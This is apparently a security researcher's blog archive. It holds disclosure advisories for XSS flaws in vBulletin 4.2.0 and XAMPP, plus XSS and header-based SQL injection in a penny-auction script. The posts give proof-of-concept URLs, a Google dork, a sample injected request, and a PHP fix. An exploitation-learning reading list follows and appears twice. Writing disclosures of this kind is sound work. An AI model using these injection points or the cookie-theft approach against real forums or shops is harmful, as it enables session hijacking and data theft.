Tuesday, June 19, 2012

vBulletin 4.2.0 XSS Vulnerability

$------------------------------------------------------------------------------------------------------------
$ vBulletin 4.2.0 XSS Vulnerability
$ Author : sangteamtham
$ Home : Hcegroup.vn
$ Download: http://members.vbulletin.com/
$ Date :06/13/2012
$ Google Dork: "Powered by vBulletin® Version 4.2.0"
$ Twitter: http://twitter.com/Sangte_amtham
$*************************************************************************************************************
1.vBulletin Description:

 Content publishing, search, security, and more— vBulletin has it all.
 Whether it’s available features, support, or ease-of-use, vBulletin offers the most for your money.
 Learn more about what makes vBulletin the choice for people who are serious about creating
 thriving online communities.

2. Vulnerability Description:

To steal cookie from administrator or any member in a forum or drive them to malicious sites, attacker will firstly create an account, then come to
calendar section, and create an event for himself.

In title, he will inject XSS code there.

In content section, he will write everything he likes. Now, he will send his profile to Administrator or any member
and wait for cookie or victims' infection.

http://127.0.0.1/vbb/member.php?id-xyz

3. Patch:

June 13, 2012: Contacted the vendor.
June 14, 2012: Vendor replied me.
June 18, 2012: the vendor released the patch for this vulnerabitily. Please download it from member Area right now.

https://members.vbulletin.com/patches.php

$**************************************************************************************************************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
$
$
$------------------------------------------------------------------------------------------------------------

How to fix it?

Here we have vulnerable file named calendar.php in:
doc_root/vb/activitystream/view/perm/calendar/event.php

In line 74 to 77

public function fetchTemplate($templatename, $activity)
{
    $eventinfo =& $this->content['event'][$activity['contentid']];
    $calendarinfo =& $this->content['calendar'][$eventinfo['calendarid']];

Our title for events doesn't work. We need to filter it like this:

public function fetchTemplate($templatename, $activity)
{
    $eventinfo =& $this->content['event'][$activity['contentid']];
    $calendarinfo =& $this->content['calendar'][$eventinfo['calendarid']];
        $eventinfo['title'] = htmlspecialchars_uni($eventinfo['title']);

Please fix it asap.

Thursday, October 27, 2011

Xampp 1.7.4 for Windows multiple Site Scripting Vulnerabilities

$-------------------------------------------------------------------------------------------------------------------
$ Xampp 1.7.4 for Windows multiple Site Scripting Vulnerabilities
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download :http://www.apachefriends.org/en/xampp-windows.html
$ Date :07/12/2011
$ Twitter: http://twitter.com/Sangte_amtham
$******************************************************************************************
1.Description:

XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really
very easy to install and to use - just download, extract and start.

2. Patch:

Jul 12, 2011: Contact to vendor.
Jul 12, 2011: Vendor said that they would fix in next release
Sep 21, 2011: Released XAMPP 1.7.7
Oct 27, 2011: Release the bug.

3. POC:

http://localhost/xampp/ming.php?text=XSS H3r3
http://localhost/xampp/cds.php/ XSS H3r3
In adodb.php, we have a form to submit database information, but this form is not filer well. So web can submit the
malicious codes.

http://localhost/xampp/adodb.php


$******************************************************************************************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
$
$
$--------------------------------------------------------------------------------------------------------------------
Reference:
http://www.securityfocus.com/bid/50381/info
http://packetstormsecurity.org/files/106244/xampp174-xss.txt
http://seclists.org/fulldisclosure/2011/Oct/944

Thursday, March 17, 2011

Peny Auction Clone (Swoopo Clone) SQL Injection and Cross Site Scripting Vulneribilities.

I am really dump in work. Working for life and put my favorites aside. Really sad :(


#-------------------------------------------------------------------------------------------------------------------
# Peny Auction Clone (Swoopo Clone) SQL Injection and Cross Site Scripting Vulneribilities.
# Author : Sangteamtham
# Home : Hcegroup.net
# Download :http://www.pennyauctionsoft.com/
# Date :03/20/2011
# Twitter:@Sangte_amtham
#
#******************************************************************************************
#1.Description:
#Pennyauctionsoft is a brand new powerful, effective and feature-rich Swoopo script Clone application
# that is ready to use out of the box.
#2.Vulnerabilities:
# I reported this to the authors. After interesting conversation, everything is still the same until now.
# Almost the the files get XSS vuls. I don't think that i will list all, but some of them.
#2.a XSS vulnerabilities:
# Some of XSS:
# http://server/index.php/"XSS
# http://server/jobs.php/"XSS
# http://server/contact.php/"XSS
# http://server/forum/index.php/"
 # http://server/forum/index.php/",



# Many of them are still get vulnerabilities.
#
#2.b: MySQL injection.
# It seems the request to server is not filtered well with client-ip using GET method.
#
#
# http://server/allauctions.php
#
# Host: www.server.com
# User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
# client-ip: 127.0.0.1 '
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: en-us,en;q=0.5
# Accept-Encoding: gzip,deflate
# Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
# Keep-Alive: 115
# Connection: keep-alive
# Cookie: PHPSESSID=dc3fa290bcf7f865d6c43bb19e607a74
#
# As demo, Attacker will get the vulnerability and try to inject and get credential information.
# Still vulnerability with :
# http://server/allauctions.php
# http://server/registration.php
# http://server/forum/forum_detail.php
#
#
#
#******************************************************************************************
# Greetz to: All Vietnamese hackers and Hackers out there researching for more security
#--------------------------------------------------------------------------------------------------------------------

 Refer:
http://www.securityfocus.com/bid/46920/
http://securityreason.com/exploitalert/10171
http://secunia.com/advisories/43801

Monday, November 8, 2010

XSS Vulnerability at blogspot.com - Google try to ignore?

I report to Google Security Team some days, but I have not received any reply from them, any fixes as well. They may think this is stuff, not problem. So the problem with whom?  Who may concerm?




I am still waiting for their reply. May be they will never concerm. 

Saturday, November 6, 2010

Xampp 1.7.3 multiple vulnerabilities

#**********************************************************
# Exploit Title: Xampp 1.7.3 XSS multiple vulnerabilities
# Date: 11/06/2010
# Author: Sangteamtham
# Software Link: http://www.apachefriends.org/en/xampp.html
# Version: 1.7.3
# Tested on: Windows 7
# Email: Sangteamtham@gmail.com
# Blog: http://sangte.blogspot.com/
# Homepage: http://hcegroup.net/hceteam
#***********************************************************

1.Description:

XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use - just download, extract and start.

2. Vulnerabilities:

http://paste2.org/p/1075584



3. Poc:



4. Patch:

Vender should filter the special characters when input the form.
Clients should set password access to xampp folder.

5. Credits:
Thanks flying to Vietnamese hackers and all hackers out there researching for more security.
*************************************************************

Google Shop Oline XSS vulnerability


     
1.  Discription:

 Google Shop Online website sell the products online like souvenir.
“ How do we keep your information secure?
    The personal information that you provide to Google Store, including your credit card or other payment information, is maintained on secure servers and protected by industry-standard Secure Socket Layer encryption. When entering personal information, look for an icon at the bottom of your browser window that indicates you are on a secure page.”
     I cut from that site.
URL: http://www.google-store.com
2.  XSS Vulnerability:
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites were roughly 80% of all security vulnerabilities documented by Symantec as of 2007.[1] Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigations implemented by the site's owner.” (wikipedia.org)
“What about cookies?
A cookie is a piece of data that identifies you as a unique user. When you visit the Google Store, we set a cookie on your computer to help identify you, customize your experience and maintain your account and order information. To protect the security of your account, you must accept the Google Store cookie in order to shop here.”( google-store.com)
    Here are some snapshops:

XSS vulnerability was on the module produc_info.php, that does not filter the special characters. Hackers use this to insert javascript code to steal cookies from Customers, Administrators and so on.
Take a look at the source view from firefox.



3.  Reference:

Friday, November 5, 2010

From 0x90 to 0x4c454554, a journey into exploitation.

 From 0x90 to 0x4c454554, a journey into exploitation.
In the last few weeks I have been diving deeper down the rabbit hole of exploitation work and with a bit of work and time to prepare myself for the long run I compiled a set of areas to study in a course type layout. I hope my research will help others spend more time learning and less time searching.
Because I am doing this myself I may have missed 1 or 2 things and along the way I will add in anything I find to help with process. So let us both get started...

First off I want to thank the corelan guys for the help they have provided me so far in the process. They have been there for me through my learning with knowledge and help. Thank you!

layout: I will be posting in a hierarchical structure, each hierarchy structure should be fully understood before moving on to the next section. I will also post sets of Parallel learning topics that you can use to study in line with other topics to help prevent monotony. These Parallel areas will have a start and end mark which shows when they should be complete in perspective to the overall learning
Here is a PDF of the course to help keep track and understand the layout. Course_layout.pdf
"New background soon -> desktop background Cheatsheet added to documents page Backgrounds

Other Posts like this one:
Because of quality of these two posts I wanted to put them at the top. I could not figure out where to put them in the list because they cover so much.
past-present-future of windows exploitation
smashing the stack in 2010(Great resource)


Part 1: Programming

Parallel learning #1:(complete this section before getting to the book "Hacking Art of exploitation")
While going through the programming area I concentrate on core topics to help us later on with exploit writing. One area that is very good to pick up is some kind of scripting language. Listed below are some of the most popular scripting languages and ones I feel will prove to be the most useful.

Python: One of my favorite languages and growing in popularity python is a powerful language that is easy to use and well documented.
Wikibooks Python
http://docs.python.org/
onlinecomputerbooks.com

Ruby: If you plan on later on working inside of metasploit this may be the language you want to start with.
Wikibooks Ruby
LittleBookOfRuby
onlinecomputerbooks.com

Perl: An older language that still has a lot of use perl is one of the highest used scripting languages and you will see it used in many exploits. (I would suggest python over perl)
[book] O'Reilly Learning Perl
onlinecomputerbooks.com


C and C++ programming:
It is very important to understand what you are exploiting so to get started let us figure out what we are exploiting. You do not need to go through all of these but when finished with this section you should have a good understanding of C and C++ programming.
Cprogramming.com
http://www.java2s.com/Tutorial/C/CatalogC.htm
http://beej.us/guide/bgc/
onlinecomputerbooks.com

X86 Assembly:
Ok now to understand what the computer reads when we compile C and C++. I am going to mostly stick to the IA-32(X86) assembly language. Read the first link to understand why. It explains it very well.
Skullsecurity: Assembly
http://en.wikibooks.org/wiki/X86_Assembly
[book]The Art of Assembly
Assembly primer for hackers

Windows Programming:
This is to help understand what we are programming in and the structure of libraries in the OS. This area is very important far down the line
http://en.wikibooks.org/wiki/Windows_Programming
http://www.relisoft.com/win32/index.htm
[book]Windows Internals 5
[book]Windows Internals 4

Disassembly:
Dissassembly is not as much programming as it is what the computer understands and the way it is interpreted from CPU and memory. This is where we start getting into the good stuff.
http://en.wikibooks.org/wiki/X86_disassembly


Part 2: Getting started

Now that we have a very good understanding of programming languages and what the machine is doing we can start working on task at hand, exploitation.
Here I will start a lot of the learning in very much a list format and adding in comments or Parallel learning areas when needed.

Smash the stack for fun and profit (Phrack 49)
C function call conventions and the stack
[videos] Code Audit from cryptocity.net

(Parallel learning #1 finished: You should now have finished on Parallel learning 1 and have a good understanding of one of the 3 languages)

[Book]Hacking art of exploitation [Chapter 1&2]
Corelan T1
Corelan T2

Parallel learning #2:(complete this section before end of part 2)
(Read the first few posts on this blog has some good info)
Kspice blog
(Read some of the post from this blog they are very helpful with starting out with fuzzers.)
Nullthreat's blog
(I am linked directly to a demo exploit for this area but this is a useful blog to keep track of for many things)
A demo exploit

tenouk.com: Buffer overflow intro
The Tao of Windows Buffer Overflow
nsfsecurity on BOF
Hacker center: BOF
[video] Buffer overflow Primer
[Book]Shellcoder's Handbook Ch1&2
[Book]Hacking art of exploitation [Chapter 3]
Corelan T3A
Corelan T3B
SEH overwrite simplified

((Parallel learning #2 finished:)

Part 3:Tools of the trade

This is a list of tools I have started using and find very useful.
Immunity Debugger
Ollydbg
Windbg
IDA Pro
explorer suite
Sysinternals

And here are some corelan posts on how to use them. I will supply more in future but this is a very good start.
Corelan T5
Corelan: Immunity debugger cheatsheet

Part 4: Network and Metasploit

(Networking)
Beej.us network programming
[Book]Hacking art of exploitation [Chapter 4]

(Metasploit)
[Video]Security Tube: Metasploit Megaprimer
Metasploit.com
Metasploit Unleashed
Metasploit Louisville Class
Metasploitable (a target)
Corelan T4
intern0t: developing my first exploit
DHAtEnclaveForensics: Exploit Creation in Metasploit
Wikibooks Metasploit/Writing Windows Exploit


Part 5: Shellcode

Corelan T9
[Book]Shellcoder's Handbook Ch3
[Book]Hacking art of exploitation [Chapter 5]
Writing small shellcode
Shell-storm Shellcode database


Part 6: Engineering in Reverse

Parallel Learning #3:(constant place to reference and use for reversing)
[forum]reverse-engineering.net
Reverse Engineering the World
Room362.com reversing blog post

Ethicalhacker.net intro to reverse engineering
acm.uiuc.edu Intro to Reverse Engineering software
[Book]Reversing: secrets of reverse engineering
[video]Reverse Engineering from cryptocity.net
CrackZ's Reverse Engineering Page
Reverse engineering techniques

[GAME]Crackmes.de

Part 7: Getting a little deeper into BOF

Parallel Learning #4:(To the end of the course and beyond)
Find old exploits on Exploit-db download them, test them, rewrite them, understand them.

[video]Exploitation from cryptocity.net
Buffer overflow protection
Wikipedia Executable space protextion
Wikipedia DEP
Wikipedia ASLR
Purdue.edu: Canary Bit
Corelan T6
Bypassing Hardware based DEP
Corelan T7
Corelan T8
Corelan T10
Virtual Worlds - Real Exploits

[GAME]Smash the stack wargaming network

Part 8: Heap overflow

rm -rf / on heap overflow
w00w00 on heap overflow
[book][Book]Shellcoder's Handbook Ch4&5
h-online A heap of Risk
[video]Defcon 15 remedial Heap Overflows
heap overflow: ancient art of unlink seduction
Memory corruptions part II -- heap

[book]Read the rest of Shellcoder's Handbook

Part 9: Exploit listing sites

Exploit-DB
Injector
CVE Details
Packetstorm
CERT
Mitre
National Vulnerability Database

(bonus: site that lists types of vulnerabilties and info)
Common Weakness Enumberation

Part 10: To come

1. Fuzzing
2. Might be a while but I plan on doing a whole web exploitation post that will be an add to this but a whole new post



If anyone has any good links to add post a comment and I will try to add them or send me the link and I will review and add it.
From 0x90 to 0x4c454554, a journey into exploitation.
In the last few weeks I have been diving deeper down the rabbit hole of exploitation work and with a bit of work and time to prepare myself for the long run I compiled a set of areas to study in a course type layout. I hope my research will help others spend more time learning and less time searching.
Because I am doing this myself I may have missed 1 or 2 things and along the way I will add in anything I find to help with process. So let us both get started...

First off I want to thank the corelan guys for the help they have provided me so far in the process. They have been there for me through my learning with knowledge and help. Thank you!

layout: I will be posting in a hierarchical structure, each hierarchy structure should be fully understood before moving on to the next section. I will also post sets of Parallel learning topics that you can use to study in line with other topics to help prevent monotony. These Parallel areas will have a start and end mark which shows when they should be complete in perspective to the overall learning
Here is a PDF of the course to help keep track and understand the layout. Course_layout.pdf
"New background soon -> desktop background Cheatsheet added to documents page Backgrounds

Other Posts like this one:
Because of quality of these two posts I wanted to put them at the top. I could not figure out where to put them in the list because they cover so much.
past-present-future of windows exploitation
smashing the stack in 2010(Great resource)


Part 1: Programming

Parallel learning #1:(complete this section before getting to the book "Hacking Art of exploitation")
While going through the programming area I concentrate on core topics to help us later on with exploit writing. One area that is very good to pick up is some kind of scripting language. Listed below are some of the most popular scripting languages and ones I feel will prove to be the most useful.

Python: One of my favorite languages and growing in popularity python is a powerful language that is easy to use and well documented.
Wikibooks Python
http://docs.python.org/
onlinecomputerbooks.com

Ruby: If you plan on later on working inside of metasploit this may be the language you want to start with.
Wikibooks Ruby
LittleBookOfRuby
onlinecomputerbooks.com

Perl: An older language that still has a lot of use perl is one of the highest used scripting languages and you will see it used in many exploits. (I would suggest python over perl)
[book] O'Reilly Learning Perl
onlinecomputerbooks.com


C and C++ programming:
It is very important to understand what you are exploiting so to get started let us figure out what we are exploiting. You do not need to go through all of these but when finished with this section you should have a good understanding of C and C++ programming.
Cprogramming.com
http://www.java2s.com/Tutorial/C/CatalogC.htm
http://beej.us/guide/bgc/
onlinecomputerbooks.com

X86 Assembly:
Ok now to understand what the computer reads when we compile C and C++. I am going to mostly stick to the IA-32(X86) assembly language. Read the first link to understand why. It explains it very well.
Skullsecurity: Assembly
http://en.wikibooks.org/wiki/X86_Assembly
[book]The Art of Assembly
Assembly primer for hackers

Windows Programming:
This is to help understand what we are programming in and the structure of libraries in the OS. This area is very important far down the line
http://en.wikibooks.org/wiki/Windows_Programming
http://www.relisoft.com/win32/index.htm
[book]Windows Internals 5
[book]Windows Internals 4

Disassembly:
Dissassembly is not as much programming as it is what the computer understands and the way it is interpreted from CPU and memory. This is where we start getting into the good stuff.
http://en.wikibooks.org/wiki/X86_disassembly


Part 2: Getting started

Now that we have a very good understanding of programming languages and what the machine is doing we can start working on task at hand, exploitation.
Here I will start a lot of the learning in very much a list format and adding in comments or Parallel learning areas when needed.

Smash the stack for fun and profit (Phrack 49)
C function call conventions and the stack
[videos] Code Audit from cryptocity.net

(Parallel learning #1 finished: You should now have finished on Parallel learning 1 and have a good understanding of one of the 3 languages)

[Book]Hacking art of exploitation [Chapter 1&2]
Corelan T1
Corelan T2

Parallel learning #2:(complete this section before end of part 2)
(Read the first few posts on this blog has some good info)
Kspice blog
(Read some of the post from this blog they are very helpful with starting out with fuzzers.)
Nullthreat's blog
(I am linked directly to a demo exploit for this area but this is a useful blog to keep track of for many things)
A demo exploit

tenouk.com: Buffer overflow intro
The Tao of Windows Buffer Overflow
nsfsecurity on BOF
Hacker center: BOF
[video] Buffer overflow Primer
[Book]Shellcoder's Handbook Ch1&2
[Book]Hacking art of exploitation [Chapter 3]
Corelan T3A
Corelan T3B
SEH overwrite simplified

((Parallel learning #2 finished:)

Part 3:Tools of the trade

This is a list of tools I have started using and find very useful.
Immunity Debugger
Ollydbg
Windbg
IDA Pro
explorer suite
Sysinternals

And here are some corelan posts on how to use them. I will supply more in future but this is a very good start.
Corelan T5
Corelan: Immunity debugger cheatsheet

Part 4: Network and Metasploit

(Networking)
Beej.us network programming
[Book]Hacking art of exploitation [Chapter 4]

(Metasploit)
[Video]Security Tube: Metasploit Megaprimer
Metasploit.com
Metasploit Unleashed
Metasploit Louisville Class
Metasploitable (a target)
Corelan T4
intern0t: developing my first exploit
DHAtEnclaveForensics: Exploit Creation in Metasploit
Wikibooks Metasploit/Writing Windows Exploit


Part 5: Shellcode

Corelan T9
[Book]Shellcoder's Handbook Ch3
[Book]Hacking art of exploitation [Chapter 5]
Writing small shellcode
Shell-storm Shellcode database


Part 6: Engineering in Reverse

Parallel Learning #3:(constant place to reference and use for reversing)
[forum]reverse-engineering.net
Reverse Engineering the World
Room362.com reversing blog post

Ethicalhacker.net intro to reverse engineering
acm.uiuc.edu Intro to Reverse Engineering software
[Book]Reversing: secrets of reverse engineering
[video]Reverse Engineering from cryptocity.net
CrackZ's Reverse Engineering Page
Reverse engineering techniques

[GAME]Crackmes.de

Part 7: Getting a little deeper into BOF

Parallel Learning #4:(To the end of the course and beyond)
Find old exploits on Exploit-db download them, test them, rewrite them, understand them.

[video]Exploitation from cryptocity.net
Buffer overflow protection
Wikipedia Executable space protextion
Wikipedia DEP
Wikipedia ASLR
Purdue.edu: Canary Bit
Corelan T6
Bypassing Hardware based DEP
Corelan T7
Corelan T8
Corelan T10
Virtual Worlds - Real Exploits

[GAME]Smash the stack wargaming network

Part 8: Heap overflow

rm -rf / on heap overflow
w00w00 on heap overflow
[book][Book]Shellcoder's Handbook Ch4&5
h-online A heap of Risk
[video]Defcon 15 remedial Heap Overflows
heap overflow: ancient art of unlink seduction
Memory corruptions part II -- heap

[book]Read the rest of Shellcoder's Handbook

Part 9: Exploit listing sites

Exploit-DB
Injector
CVE Details
Packetstorm
CERT
Mitre
National Vulnerability Database

(bonus: site that lists types of vulnerabilties and info)
Common Weakness Enumberation

Part 10: To come

1. Fuzzing
2. Might be a while but I plan on doing a whole web exploitation post that will be an add to this but a whole new post



If anyone has any good links to add post a comment and I will try to add them or send me the link and I will review and add it.

Read more.